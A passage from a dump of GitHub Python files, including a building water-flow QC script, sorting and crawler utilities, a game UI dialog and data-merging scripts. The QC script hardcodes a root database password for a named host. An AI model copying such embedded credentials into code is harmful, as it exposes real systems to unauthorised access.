=\"\"\"+bldgIDQ1+\"\"\" AND time >= \"\"\"+dates[0]+\"\"\" AND time <= \"\"\"+dates[1]+\"\"\"\"\"\"\n# send query\n\"\"\"\nprint('Retrieving data...')\n\nresults = client.query(query)\n# Query returns a 'ResultSet\" type. 
Have to convert to pandas dataframe.\n# Convert returned ResultSet to Pandas dataframe with list and get_points.\ndf = pd.DataFrame(list(results.get_points(measurement='flow')))\n# Set dataframe index as datetime.\ndf['time'] = pd.to_datetime(df['time'])\ndf.set_index('time', inplace=True)\n\"\"\"\n\nprint('Data retrieved!\\n')\n\n\n# Begin QC ##################\n\n# Temperature QC ############\n\n# tempQC: correlation, BLDG B\nif bldg == 'B' and week == 1:\n\n\n\n # Adjust inaccurate BldgB temp data with correlation from Bldg D temp data\n print ('Fetching data to adjust BLDG B temp data...')\n bldgIDQ2 = \"'D'\"\n beginDate2 = \"'2019-03-22T12:00:00Z'\"\n endDate2 = \"'2019-03-27T16:00:00Z'\"\n # query 2nd correlation dataset and convert to dataframe\n query = \"\"\"SELECT \"hotInTemp\" \n FROM \"flow\" \n WHERE \"buildingID\" =\"\"\" + bldgIDQ2 + \"\"\" AND time >= \"\"\" + beginDate2 + \"\"\" AND time <= \"\"\" + endDate2 + \"\"\"\"\"\"\n\n results = client.query(query)\n df_2 =pd.DataFrame(list(results.get_points(measurement='flow')))\n df_2['time'] = pd.to_datetime(df_2['time'])\n df_2.set_index('time', inplace=True)\n print('Adjustment data retrieved.\\n')\n df_2.rename(columns={'hotInTemp': 'hotInTemp_D'}, inplace=True)\n\n mainHot = df['hotInTemp'].truncate(after=pd.Timestamp('2019-03-27T16:00:00Z')).copy()\n mainHot = mainHot.to_frame()\n mainHotQC = pd.merge(mainHot, df_2, on='time')\n\n print('Calculating new temp values...')\n mainHotQC['hotInTemp'] = 8.25122766 + 0.8218035674 * mainHotQC['hotInTemp_D']\n df['hotInTemp'].update(mainHotQC['hotInTemp']) # update original dataframe, df\n print('New hotInTemp values for BLDG B calculated!\\n')\n\n\n temp_old = df['hotInTemp'].iloc[0] # Because of differences in missed second observations, have to\n for i, row in df.iterrows(): # parse through QCed dataframe and adjust unadjusted values\n x = row['hotInTemp'] # i.e. B temp data has 12:00:01 while D temp data does not, so\n if x < 40: # that timestamp is not updated with QC. Fix by replacing with prev temp value\n df.at[i, 'hotInTemp'] = temp_old\n else:\n temp_old = row['hotInTemp']\n\n# tempQC: level shift\ndf_temp = df.copy()\n# Add calibration factor to each value\nprint('Level shifting temp values...')\ncolumns = ['hotInTemp', 'hotOutTemp','coldInTemp']\nfor (column, cal) in zip(columns, calibration_temp(bldg)):\n df_temp[column] = df_temp[column] + cal\nprint('Level shifting temp values complete!\\n')\n\n\n# tempQC: point fix. Unless all heat exited the universe in this one second, Temp did not drop to -1333 deg Celsius\nif bldg == 'F' and week == 4:\n df_temp.at['2019-04-15T15:55:33', 'hotInTemp'] = 53.18400\n\n# Flow QC ###################\n\n\n# flowQC: filter noise\ndf_filter=df_temp.copy()\n\nprint('Filtering noise from hotInFlowRate...')\ndf_filter['hotInFlowRate'] = adaptiveMedianFilter(df_filter['hotInFlowRate'], 9, 301,0.5) # filter noise in hotInFlowRate\n # adaptiveMedianFilter(signal, minWindowSize, maxWindowSize, Threshold)\nprint('hotInFlowRate complete!')\nprint('Filtering noise from coldInFlowRate...')\ndf_filter['coldInFlowRate'] = adaptiveMedianFilter(df_filter['coldInFlowRate'], 1, 301,0.5) # filter noise in coldInFlowRate\n # adaptiveMedianFilter(signal, minWindowSize, maxWindowSize, Threshold)\nprint('coldInFlowRate complete! 
\\n')\n\n\n\n\n\n# flowQC: fix return flow for bldg E\nx=0\nif bldg == 'E' and week == 1:\n df_2 = df_filter.truncate(after=pd.Timestamp('2019-03-22T14:20:23Z')).copy()\n counter = 0\n for i, row in df_2.iterrows():\n if x < 4:\n if counter < 16: # average pulse rate for this timeframe from other three weeks\n df_2.at[i, 'hotOutFlowRate'] = 0 # is 17.26 seconds/pulse. Mod code to add 18 second pulse every\n counter += 1 # every 4th pulse inserted to account for 0.26 second offset\n else:\n df_2.at[i, 'hotOutFlowRate'] = 1\n counter = 0\n x += 1\n elif x == 4:\n if counter < 17:\n df_2.at[i, 'hotOutFlowRate'] = 0\n counter += 1\n else:\n df_2.at[i, 'hotOutFlowRate'] = 1\n x = 1\n counter = 0\n\n\n df_filter['hotOutFlowRate'].update(df_2['hotOutFlowRate'])\n\n\ndf_shift = df_filter.copy()\n# flowQC: level shift\nprint('Level shifting hotInFlowRate values...')\nif bldg == 'B' and week == 4:\n df_2 = df_shift.truncate(before=pd.Timestamp('2019-04-16T19:40:00Z')).copy()\n df_2['hotInFlowRate'] = df_2['hotInFlowRate'] - 0.032\n df_shift['hotInFlowRate'].update(df_2['hotInFlowRate'])\nelif bldg == 'E' and week != 1:\n df_2 = df_shift.truncate(before=pd.Timestamp('2019-04-04T02:22:55Z')).copy()\n df_2['hotInFlowRate'] = df_2['hotInFlowRate'] - 0.031\n df_shift['hotInFlowRate'].update(df_2['hotInFlowRate'])\nprint('Level shifting flow complete! \\n')\n\n\n\n# flowQC: Pulse Aggregation\nprint('Aggregating pulses...')\ndf_agg = df_shift.copy()\ncoldInFlow_Sum =0 # Initalize variables to aggregate temp/flows in between pulses\nhotInFlow_Sum = 0\nhotInTemp_Sum = 0\ncoldInTemp_Sum = 0\nhotOutTemp_Sum = 0\ncounter = 0 # counter will count seconds between pulses\nfor i, row in df_agg.iterrows():\n if row['hotOutFlowRate'] == 0:\n coldInFlow_Sum = coldInFlow_Sum + row['coldInFlowRate']\n coldInTemp_Sum = coldInTemp_Sum +row['coldInTemp']\n hotInFlow_Sum = hotInFlow_Sum + row['hotInFlowRate']\n hotInTemp_Sum = hotInTemp_Sum + row['hotInTemp']\n hotOutTemp_Sum = hotOutTemp_Sum + row['hotOutTemp']\n counter += 1\n elif row['hotOutFlowRate'] != 0:\n counter = counter + 1\n coldInFlow_Sum = coldInFlow_Sum + row['coldInFlowRate']\n coldInTemp_Sum = (coldInTemp_Sum + row['coldInTemp']) / counter\n hotInFlow_Sum = hotInFlow_Sum + row['hotInFlowRate']\n hotInTemp_Sum = (hotInTemp_Sum + row['hotInTemp']) / counter\n hotOutTemp_Sum = (hotOutTemp_Sum + row['hotOutTemp']) / counter\n\n df_agg.at[i,'coldInFlowRate'] = coldInFlow_Sum\n df_agg.at[i,'coldInTemp'] = coldInTemp_Sum\n df_agg.at[i, 'hotInFlowRate'] = hotInFlow_Sum\n df_agg.at[i, 'hotInTemp'] = hotInTemp_Sum\n df_agg.at[i, 'hotOutTemp'] = hotOutTemp_Sum\n\n coldInFlow_Sum = 0 # Zero running sums after calculating aggregated values\n coldInTemp_Sum = 0\n hotInFlow_Sum = 0\n hotInTemp_Sum = 0\n hotOutTemp_Sum = 0\n counter = 0\n\nprint('Pulse aggregation complete!')\n\n\ndf_pulse = df_agg[(df_agg['hotOutFlowRate'] != 0)]\ndf_pulse['coldInFlowRate'] = df_pulse['coldInFlowRate']/60 # convert from gpm to gps\ndf_pulse['hotInFlowRate'] = df_pulse['hotInFlowRate']/60 # convert from gpm to gps\ndf_pulse['hotOutFlowRate'] = 1 # 1 pulse = 1 gal. 
So every pulse indicates 1 gal has passed through the return system\n\n\n# flowQC: zero hot water flow\n# clamp the supply to the 1 gal returned so hotWaterUse below cannot go negative\nfor i, row in df_pulse.iterrows():\n    if row['hotInFlowRate'] < 1:\n        df_pulse.at[i, 'hotInFlowRate'] = 1\n\ndf_pulse['hotWaterUse'] = df_pulse['hotInFlowRate'] - df_pulse['hotOutFlowRate']\n\ndf_final = df_pulse.copy()\n\n# Add building ID, influx write_points requires all data coming from the dataframe\ndf_final['buildingID'] = bldg\n\n\nprint('QC Completed!\\n')\n\n\nprint('Plotting final flowrates...')\n# print final data\n# Initialize figures and subplots\ngridsize = (3, 1)\nfig = plt.figure(1, figsize=(12, 8))\nfig.autofmt_xdate()\nfig.suptitle('Final Flowrates for BLDG '+bldg, fontsize=14, weight='bold')\n\n# 1st row - hot in\naxHotFlow = plt.subplot2grid(gridsize, (0,0))\nplt.xticks(fontsize=8, rotation=35)\naxHotFlow.plot(df_final['hotInFlowRate'], color='red', label='hotIn_final')\naxHotFlow.set_title('hot water flowrate', fontsize=10, weight='bold')\naxHotFlow.set_ylabel('Gallons per pulse')\n#axHotFlow.set_xlim(dates[0], dates[1])\naxHotFlow.grid(True)\n\n# 2nd row - cold in\naxColdFlow = plt.subplot2grid(gridsize, (1,0))\nplt.xticks(fontsize=8, rotation=35)\naxColdFlow.plot(df_final['coldInFlowRate'], color='blue', label='coldWaterUse_final')\naxColdFlow.set_title('cold water flowrate', fontsize=10, weight='bold')\naxColdFlow.set_ylabel('Gallons per pulse')\n#axColdFlow.set_xlim(dates[0], dates[1])\naxColdFlow.grid(True)\n\n# 3rd row - hot return\naxHotWaterUse = plt.subplot2grid(gridsize, (2,0))\nplt.xticks(fontsize=8, rotation=35)\naxHotWaterUse.plot(df_final['hotWaterUse'], color='maroon', label='hotWaterUse_final')\naxHotWaterUse.set_title('hotWaterUse', fontsize=10, weight='bold')\naxHotWaterUse.set_ylabel('Gallons per pulse')\n#axHotWaterUse.set_xlim(dates[0], dates[1])\n#axHotWaterUse.set_ylim(-0.01, 0.05)\naxHotWaterUse.grid(True)\n\nfig.show()\nplt.tight_layout(pad=5, w_pad=2, h_pad=2.5)\n\n\nprint('Plotting final temperatures...')\nfig2 = plt.figure(2, figsize=(12, 8))\nfig2.suptitle('Final Temps for BLDG '+bldg, fontsize=14, weight='bold')\n\ngridsize = (2,1)\naxHotTemp = plt.subplot2grid(gridsize, (0,0))\nplt.xticks(fontsize=8, rotation=35)\naxHotTemp.plot(df_final['hotInTemp'], color='red', label='hotIn_final')\naxHotTemp.plot(df_final['hotOutTemp'], color='maroon', label='hotOut_final')\naxHotTemp.set_title('hot water temp', fontsize=10, weight='bold')\naxHotTemp.set_ylabel('Temp (C)')\n#axHotTemp.set_xlim(dates[0], dates[1])\naxHotTemp.grid(True)\n\naxColdTemp = plt.subplot2grid(gridsize, (1,0))\nplt.xticks(fontsize=8, rotation=35)\naxColdTemp.plot(df_final['coldInTemp'], color='blue', label='coldIn_final')\naxColdTemp.set_title('cold water temp', fontsize=10, weight='bold')\naxColdTemp.set_ylabel('Temp (C)')\n#axColdTemp.set_xlim(dates[0], dates[1])\naxColdTemp.grid(True)\n\nplt.tight_layout(pad=5, w_pad=2, h_pad=2.5)\nfig2.show()\nplt.show()\n\nx = input('Do you want to write to database? 
(y/n): ').upper()\n\nif x == 'Y':\n\n    # WritePoints\n    print('Connecting to database...')\n    clientdf = DataFrameClient(host='odm2equipment.uwrl.usu.edu', port=8086, username='root', password='foobar123')\n    clientdf.switch_database('ciws_final')\n    print('Writing points...')\n    # DataFrameClient.write_points expects field_columns/tag_columns as lists of column names\n    clientdf.write_points(dataframe=df_final, measurement='LLC',\n                          field_columns=['hotInFlowRate',\n                                         'coldInFlowRate',\n                                         'hotOutFlowRate',\n                                         'hotInTemp',\n                                         'coldInTemp',\n                                         'hotOutTemp'],\n                          tag_columns=['buildingID'],\n                          protocol='line', numeric_precision=10, batch_size=2000)\n    clientdf.write_points(dataframe=df_final, measurement='LLC',\n                          field_columns=['hotInTemp',\n                                         'hotOutTemp'],\n                          tag_columns=['buildingID'],\n                          protocol='line', numeric_precision=10, batch_size=2000)\n\nelse:\n    print('Better luck next time...')\n\n\n\n\nprint('DONE!!')\n\n","repo_name":"jBrewing/LLC_Tools","sub_path":"dataQC_final.py","file_name":"dataQC_final.py","file_ext":"py","file_size_in_byte":15027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"24298008565","text":"from typing import List\n\n\n# Python passes lists by reference, so merge_sort sorts the list in place\ndef merge_sort(array: List[int]):\n    print(\"input: {}\".format(array))\n\n    if len(array) > 1:\n\n        mid = len(array) // 2\n\n        left = array[:mid]\n        right = array[mid:]\n\n        print(\"left: {}\".format(left))\n        print(\"right: {}\".format(right))\n\n        merge_sort(left)\n        merge_sort(right)\n\n        i = j = k = 0\n\n        # Merge the two sorted halves back into array\n        while i < len(left) and j < len(right):\n            if left[i] < right[j]:\n                array[k] = left[i]\n                i += 1\n            else:\n                array[k] = right[j]\n                j += 1\n            k += 1\n\n        # Checking if any element was left\n        while i < len(left):\n            array[k] = left[i]\n            i += 1\n            k += 1\n\n        while j < len(right):\n            array[k] = right[j]\n            j += 1\n            k += 1\n\n    print(\"sorted: {}\".format(array))\n\n\nif __name__ == \"__main__\":\n    array: List[int] = [5, 3, 1, 2, 4]\n    merge_sort(array)\n    print(array)\n","repo_name":"maddmaster/algos","sub_path":"python/sorting/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"36332654335","text":"_dungeon = {}\nstarting_position = (0, 0)\n\ndef room_exists(x, y):\n\treturn _dungeon.get((x, y))\n\ndef load_rooms():\n\twith open('resources/map.txt', 'r') as map:\n\t\trows = map.readlines()\n\tx_max = len(rows[0].split('\\t'))\n\tfor y in range(len(rows)):\n\t\tcolumns = rows[y].split('\\t')\n\t\tfor x in range(x_max):\n\t\t\troom_name = columns[x].replace('\\n', '')\n\t\t\tif room_name == \"StartingRoom\":\n\t\t\t\tglobal starting_position\n\t\t\t\tstarting_position = (x, y)\n\t\t\t_dungeon[(x, y)] = None if room_name == '' else getattr(__import__('rooms'), room_name)(x, y)\n","repo_name":"mcnuggz/PythonRPG","sub_path":"dungeon.py","file_name":"dungeon.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"37289740018","text":"from bs4 import BeautifulSoup\nimport urllib.request  # bare 'import urllib' does not expose urllib.request.urlopen\nfrom urllib.parse import urlsplit\nimport lxml.html\nimport re\nimport argparse\n\n\n# ------------------\nDEBUG_MODE = True\n# ==================\n\n\n\ndef getLinks(url):\n    domain = base_url = 
\"{0.scheme}://{0.netloc}/\".format(urlsplit(url))\n html_page = urllib.request.urlopen(url)\n soup = BeautifulSoup(html_page)\n links = []\n\n for link in soup.findAll('a', attrs={'href': re.compile(\"^http://\")}):\n links.append(link.get('href'))\n\n for link in soup.findAll('a', attrs={'href': re.compile(\"^/\")}):\n links.append(domain + link.get('href')[1:])\n\n return links\n\ndef doesContain(url , lookfor):\n\n if DEBUG_MODE:\n print('Searching url: ' + url)\n\n html_page = urllib.request.urlopen(url)\n soup = BeautifulSoup(html_page)\n\n return soup.text.__contains__(lookfor)\n\n\ndef TreeSearch(url = 'http://cs.ubc.ca/~aghaee/', depth = 1, lookfor = 'Amin'):\n\n if depth == 0:\n if doesContain(url, lookfor):\n return url\n else:\n return -1\n\n result = []\n links = getLinks(url)\n\n for link in links:\n sub_result = TreeSearch(link, depth -1 , lookfor)\n\n if sub_result != -1:\n result = result + sub_result\n\n return result\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument('url', type=str)\n parser.add_argument('lookfor', type=str)\n parser.add_argument('-d', '--depth', type=int, default=1)\n args = parser.parse_args()\n\n result = TreeSearch(args.url, args.depth, args.lookfor)\n\n print('Results:\\n====================')\n if len(result) < 1:\n print(\"~~Nothing found!~~\")\n else:\n print(result)\n","repo_name":"aminrd/TreeSearch","sub_path":"Code.py","file_name":"Code.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"4027927684","text":"# REQUIRES: linux && libfftw3\n# RUN: %python \"%s\"\n\nimport math\nimport ctypes.util\nimport pydffi\n\npydffi.dlopen(ctypes.util.find_library(\"fftw3\"))\nFFI = pydffi.FFI()\nFFT = FFI.cdef(\"#include \")\n\n# Adapted from https://github.com/undees/fftw-example/blob/master/fftw_example.c\nNUM_POINTS = 64\nfftw_complex = FFT.types.fftw_complex\nsignal = FFI.arrayType(fftw_complex, NUM_POINTS)();\nresult = FFI.arrayType(fftw_complex, NUM_POINTS)();\n\ndef acquire_from_somewhere(signal):\n for i in range(NUM_POINTS):\n theta = float(i) / float(NUM_POINTS) * math.pi;\n\n signal[i][0] = 1.0 * math.cos(10.0 * theta) + \\\n 0.5 * math.cos(25.0 * theta);\n\n signal[i][1] = 1.0 * math.sin(10.0 * theta) + \\\n 0.5 * math.sin(25.0 * theta);\n\ndef do_something_with(result):\n for i in range(NUM_POINTS):\n mag = math.sqrt(result[i][0] * result[i][0] + \\\n result[i][1] * result[i][1]);\n print(\"%0.4f\" % mag);\n\n\nplan = FFT.funcs.fftw_plan_dft_1d(NUM_POINTS, signal, result, -1, 1<<6)\nacquire_from_somewhere(signal)\nFFT.funcs.fftw_execute(plan)\ndo_something_with(result)\n","repo_name":"aguinet/dragonffi","sub_path":"examples/fftw.py","file_name":"fftw.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":539,"dataset":"github-code","pt":"92"} +{"seq_id":"15167182886","text":"import pandas as pd\nimport os\nimport numpy as np\n\nos.chdir('/Users/mab8354/granddb/data')\n\n# GTEx samples (ALL)\ngtex_sex=pd.read_csv('GTExSamples_AllVariables.txt',sep='\\t')\ngtex=pd.read_csv('GTEx_v7_Annotations_SampleAttributesDS.txt',sep='\\t')\n\n# EGRET samples\negret=pd.read_csv('LCL_expression.csv')\nsamples = egret.columns[1:]\n# replace hyphens\nsamples = [x.replace('.','-') for x in samples]\n\n# find samples in df\naa = np.intersect1d(samples, gtex_sex['SampleID'], return_indices=True)\na = np.intersect1d(samples, gtex['SAMPID'], return_indices=True)\nb = 
gtex.iloc[a[2],]\nb.rename(columns = {'SAMPID':'SampleID'}, inplace = True)\n\n# select relevant columns\nsex_samples = gtex_sex.iloc[aa[2],[0,1,2,3,4,5,6,15,31,35]]\n\n# merge two subdfs\nouter_merged = pd.merge(b, sex_samples, how='outer')\n\n# do clean names\ncleannames = [x.replace('-','_') for x in outer_merged['SampleID']]\nouter_merged['cleanname'] = cleannames\n\n# save final df\nouter_merged.to_csv('egret_gtex.csv', index=False)","repo_name":"QuackenbushLab/grand","sub_path":"src/builddbDf/cells/buildegret_gtex.py","file_name":"buildegret_gtex.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"92"} +{"seq_id":"6503723153","text":"import wndMgr\nimport ui\nimport ime\nimport constInfo\nif constInfo.PSM:\n\timport localeInfo as _localeInfo\n\tlocaleInfo = _localeInfo.localeInfo()\nelse:\n\timport localeInfo\nimport app\nimport rRCvfR4c_fL4e\n\nclass PickMoneyDialog(ui.ScriptWindow):\n\tdef __init__(self):\n\t\tui.ScriptWindow.__init__(self)\n\n\t\tself.unitValue = 1\n\t\tself.maxValue = 0\n\t\tself.eventAccept = 0\n\t\tif app.ENABLE_FATIH_SAHIN_REDCOIN_SYSTEM:\n\t\t\tself.unitValue2 = 0\n\t\t\tself.maxValue2 = 0\n\t\tif app.ENABLE_WINDOW_SLIDE_EFFECT:\n\t\t\tself.EnableSlidingEffect()\n\n\tdef __del__(self):\n\t\tui.ScriptWindow.__del__(self)\n\n\tdef LoadDialog(self):\n\t\ttry:\n\t\t\tpyScrLoader = ui.PythonScriptLoader()\n\t\t\tpyScrLoader.LoadScriptFile(self, \"UIScript/PickMoneyDialog.py\")\n\t\texcept:\n\t\t\timport exception\n\t\t\texception.Abort(\"MoneyDialog.LoadDialog.LoadScript\")\n\n\t\ttry:\n\t\t\tself.board = self.GetChild(\"board\")\n\t\t\tself.maxValueTextLine = self.GetChild(\"max_value\")\n\t\t\tself.pickValueEditLine = self.GetChild(\"money_value\")\n\t\t\tif app.ENABLE_FATIH_SAHIN_REDCOIN_SYSTEM:\n\t\t\t\tself.maxValueTextLine2 = self.GetChild(\"redcoin_max_value\")\n\t\t\t\tself.pickValueEditLine2 = self.GetChild(\"redcoin_value\")\n\t\t\tself.acceptButton = self.GetChild(\"accept_button\")\n\t\t\tself.cancelButton = self.GetChild(\"cancel_button\")\n\t\texcept:\n\t\t\timport exception\n\t\t\texception.Abort(\"MoneyDialog.LoadDialog.BindObject\")\n\n\t\tself.pickValueEditLine.SetReturnEvent(ui.__mem_func__(self.OnAccept))\n\t\tself.pickValueEditLine.SetEscapeEvent(ui.__mem_func__(self.Close))\n\t\tif app.ENABLE_FATIH_SAHIN_REDCOIN_SYSTEM:\n\t\t\tself.pickValueEditLine2.SetReturnEvent(ui.__mem_func__(self.OnAccept))\n\t\t\tself.pickValueEditLine2.SetEscapeEvent(ui.__mem_func__(self.Close))\n\t\tself.acceptButton.SetEvent(ui.__mem_func__(self.OnAccept))\n\t\tself.cancelButton.SetEvent(ui.__mem_func__(self.Close))\n\t\tself.board.SetCloseEvent(ui.__mem_func__(self.Close))\n\n\tdef Destroy(self):\n\t\tself.ClearDictionary()\n\t\tself.eventAccept = 0\n\t\tself.maxValue = 0\n\t\tself.pickValueEditLine = 0\n\t\tif app.ENABLE_FATIH_SAHIN_REDCOIN_SYSTEM:\n\t\t\tself.maxValue2 = 0\n\t\t\tself.pickValueEditLine2 = 0\n\t\tself.acceptButton = 0\n\t\tself.cancelButton = 0\n\t\tself.board = None\n\n\tdef SetTitleName(self, text):\n\t\tself.board.SetTitleName(text)\n\n\tdef SetAcceptEvent(self, event):\n\t\tself.eventAccept = event\n\n\tdef SetMax(self, max):\n\t\tself.pickValueEditLine.SetMax(max)\n\t\tif app.ENABLE_FATIH_SAHIN_REDCOIN_SYSTEM:\n\t\t\tself.pickValueEditLine2.SetMax(max)\n\n\tif app.ENABLE_FATIH_SAHIN_REDCOIN_SYSTEM:\n\t\tdef Open(self, maxValue, maxValue2, unitValue=0, unitValue2=0):\n\t\t\tif localeInfo.IsYMIR() or localeInfo.IsCHEONMA() or 
localeInfo.IsHONGKONG():\n\t\t\t\tunitValue = \"\"\n\t\t\t\tunitValue2 = \"\"\n\n\t\t\twidth = self.GetWidth()\n\t\t\t(mouseX, mouseY) = wndMgr.GetMousePosition()\n\n\t\t\tif mouseX + width/2 > wndMgr.GetScreenWidth():\n\t\t\t\txPos = wndMgr.GetScreenWidth() - width\n\t\t\telif mouseX - width/2 < 0:\n\t\t\t\txPos = 0\n\t\t\telse:\n\t\t\t\txPos = mouseX - width/2\n\n\t\t\tself.SetPosition(xPos, mouseY - self.GetHeight() - 20)\n\n\t\t\tself.maxValueTextLine.SetText(\" / \" + str(maxValue))\n\t\t\tself.maxValueTextLine2.SetText(\" / \" + str(maxValue2))\n\n\t\t\tself.pickValueEditLine.SetText(str(unitValue))\n\t\t\tself.pickValueEditLine.SetFocus()\n\n\t\t\tself.pickValueEditLine2.SetText(str(unitValue2))\n\t\t\tself.pickValueEditLine2.SetFocus()\n\n\t\t\time.SetCursorPosition(1)\n\n\t\t\t# rRCvfR4c_fL4e.AppendChat(rRCvfR4c_fL4e.CHAT_TYPE_INFO, \"unitValue:\"+str(unitValue)+\"unitValue2\"+str(unitValue2))\n\n\t\t\tself.unitValue = unitValue\n\t\t\tself.unitValue2 = unitValue2\n\t\t\tself.maxValue = maxValue\n\t\t\tself.maxValue2 = maxValue2\n\t\t\tself.Show()\n\t\t\tself.SetTop()\n\telse:\n\t\tdef Open(self, maxValue, unitValue=1):\n\n\t\t\tif localeInfo.IsYMIR() or localeInfo.IsCHEONMA() or localeInfo.IsHONGKONG():\n\t\t\t\tunitValue = \"\"\n\n\t\t\twidth = self.GetWidth()\n\t\t\t(mouseX, mouseY) = wndMgr.GetMousePosition()\n\n\t\t\tif mouseX + width/2 > wndMgr.GetScreenWidth():\n\t\t\t\txPos = wndMgr.GetScreenWidth() - width\n\t\t\telif mouseX - width/2 < 0:\n\t\t\t\txPos = 0\n\t\t\telse:\n\t\t\t\txPos = mouseX - width/2\n\n\t\t\tself.SetPosition(xPos, mouseY - self.GetHeight() - 20)\n\n\t\t\tif localeInfo.IsARABIC():\n\t\t\t\tself.maxValueTextLine.SetText(\"/\" + str(maxValue))\n\t\t\telse:\n\t\t\t\tself.maxValueTextLine.SetText(\" / \" + str(maxValue))\n\n\t\t\tself.pickValueEditLine.SetText(str(unitValue))\n\t\t\tself.pickValueEditLine.SetFocus()\n\n\t\t\time.SetCursorPosition(1)\n\n\t\t\tself.unitValue = unitValue\n\t\t\tself.maxValue = maxValue\n\t\t\tself.Show()\n\t\t\tself.SetTop()\n\n\tdef Close(self):\n\t\tself.pickValueEditLine.KillFocus()\n\t\tif app.ENABLE_FATIH_SAHIN_REDCOIN_SYSTEM:\n\t\t\tself.pickValueEditLine2.KillFocus()\n\t\tself.Hide()\n\n\tif app.ENABLE_FATIH_SAHIN_REDCOIN_SYSTEM:\n\t\tdef OnAccept(self):\n\t\t\ttext = self.pickValueEditLine.GetText()\n\t\t\ttext2 = self.pickValueEditLine2.GetText()\n\n\t\t\t# rRCvfR4c_fL4e.AppendChat(rRCvfR4c_fL4e.CHAT_TYPE_INFO, \"text:\"+str(text)+\"text2\"+str(text2))\n\n\t\t\t# Parse each field on its own: \"\".isdigit() is False, so an empty\n\t\t\t# input can no longer reach long()/int() and raise a ValueError.\n\t\t\tmoney = 0\n\t\t\tredcoin = 0\n\t\t\tif text.isdigit():\n\t\t\t\tmoney = min(long(text), self.maxValue)\n\t\t\tif text2.isdigit():\n\t\t\t\tredcoin = min(int(text2), self.maxValue2)\n\n\t\t\tif money > 0 or redcoin > 0:\n\t\t\t\tif self.eventAccept:\n\t\t\t\t\tself.eventAccept(money, redcoin)\n\t\t\telse:\n\t\t\t\trRCvfR4c_fL4e.AppendChat(rRCvfR4c_fL4e.CHAT_TYPE_INFO, \"Info: Please enter a value.\")\n\n\t\t\tself.Close()\n\telse:\n\t\tdef OnAccept(self):\n\n\t\t\ttext = self.pickValueEditLine.GetText()\n\n\t\t\tif len(text) > 0 and text.isdigit():\n\n\t\t\t\tmoney = long(text)\n\t\t\t\tmoney = min(money, self.maxValue)\n\n\t\t\t\tif money > 0:\n\t\t\t\t\tif 
self.eventAccept:\n\t\t\t\t\t\tself.eventAccept(money)\n\n\t\t\tself.Close()\n","repo_name":"fatihsahinn/Metin2-Coin-System","sub_path":"Python/uipickmoney.py","file_name":"uipickmoney.py","file_ext":"py","file_size_in_byte":5535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"18263189853","text":"import re\n\n# input_lines='''\\\n# aba[bab]xyz\n# xyx[xyx]xyx\n# aaa[kek]eke\n# zazbz[bzb]cdb'''.splitlines()\n\ninput_lines = open('input.txt')\n\ncount = 0\nfor line in input_lines:\n supernet = re.split(r'\\[\\w+\\]', line)\n hypernet = re.compile(r'\\[(\\w+)\\]').findall(line)\n for part in supernet:\n matches = re.compile(r'(?=(\\w)(\\w)\\1)').findall(part)\n found = False\n for match in matches:\n a, b = match\n bab = b + a + b\n if a != b and any(bab in h for h in hypernet):\n found = True\n break\n if found:\n count += 1\nprint(count)","repo_name":"ceronman/adventofcode","sub_path":"2016/day7/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"94"} +{"seq_id":"31420216576","text":"from collections.abc import Iterable\n\n\ndef assert_prolog_output_the_same(self, expected: list, actual: list, ignore_duplicates=False, nested_ignore=False):\n if len(expected) >= 2 and expected[-1] == \"false\":\n expected.pop()\n if len(actual) >= 2 and actual[-1] == \"false\":\n actual.pop()\n if ignore_duplicates and nested_ignore:\n comparison = compare_list_just_like_a_set_nested(expected, actual)\n self.assertTrue(comparison)\n return\n if ignore_duplicates:\n comparison = compare_list_just_like_a_set(expected, actual)\n self.assertTrue(comparison)\n return\n self.assertCountEqual(expected, actual)\n\n\ndef compare_list_just_like_a_set_nested(list1, list2):\n def comparator(x, y):\n if not isinstance(x, Iterable) or not isinstance(y, Iterable):\n return x == y\n return compare_list_just_like_a_set_nested(x, y)\n return compare_list_just_like_a_set(list1, list2, comparator)\n\n\ndef compare_list_just_like_a_set(list1, list2, comparator=(lambda x, y: x == y)):\n for item1 in list1:\n for item2 in list2:\n if comparator(item1, item2):\n break\n else:\n return False\n for item2 in list2:\n for item1 in list1:\n if comparator(item1, item2):\n break\n else:\n return False\n return True\n\n\n\ndef remove_duplicates(lst, nested_remove_duplicates=False):\n if not isinstance(lst, list):\n return lst\n\n ret = []\n for curr_lst in lst:\n if isinstance(curr_lst, list) and nested_remove_duplicates:\n curr_lst = remove_duplicates(curr_lst, nested_remove_duplicates=nested_remove_duplicates)\n for added in ret:\n if added == curr_lst:\n break\n else:\n ret.append(curr_lst)\n return ret\n\n\ndef remove_trailing_false_or_true(value):\n value = value[:]\n if len(value) == 0:\n return value\n if value[-1] in ('true', 'false'):\n value.pop()\n return value","repo_name":"Hzzkygcs/heizscheduler-prolog","sub_path":"python/HzzProlog/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"21401142184","text":"\"\"\"Removing pure_org so I can re-create it correctly.\n\nRevision ID: 9f257b57fca6\nRevises: 8a1caca53d6c\nCreate Date: 2017-04-16 19:10:13.521359\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import oracle\n\n# revision identifiers, used by Alembic.\nrevision = 
